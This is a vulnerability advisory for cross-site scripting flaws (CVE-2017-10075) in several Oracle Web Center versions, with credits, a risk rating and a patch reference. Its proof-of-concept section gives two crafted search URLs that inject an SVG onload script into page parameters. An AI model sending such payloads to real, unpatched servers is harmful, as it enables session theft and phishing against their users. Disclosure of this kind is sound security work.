Oracle Web Center 11.1.1.9.0 / 12.2.1.1.0 / 12.2.1.2.0 XSS

Oracle Web Center versions 11.1.1.9.0, 12.2.1.1.0, and 12.2.1.2.0 suffer from a cross site scripting vulnerability.


MD5 | 1e3f00f41f33004fa4e281208e66410b

Oracle Web Center XSS


Details
========================================================================================
Product: Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]
Security-Risk: High
Remote-Exploit: yes
Vendor-URL: https://www.oracle.com/
CVE-ID: CVE-2017-10075
CVSS: 8.2

Credits
========================================================================================
Discovered by: Owais Mehtab & Tayeeb Rana


Affected Products:
========================================================================================
Oracle Web Center [Versions 11.1.1.9.0, 12.2.1.1.0, 12.2.1.2.0]


Description
========================================================================================
Two Cross site scripting (XSS) vulnerabilities have been identified in Oracle Web Center,
the vulnerability can be easily exploited and can be used to steal cookies,
perform phishing attacks and other various attacks compromising the security of a
user.

Proof of Concept
========================================================================================
http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO


http://example.com/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(/xss/)>




Solution
========================================================================================
Apply Oracle CPU July 2017

--
Regards,
Owais Mehtab & Tayeeb Rana

Related Posts

Comments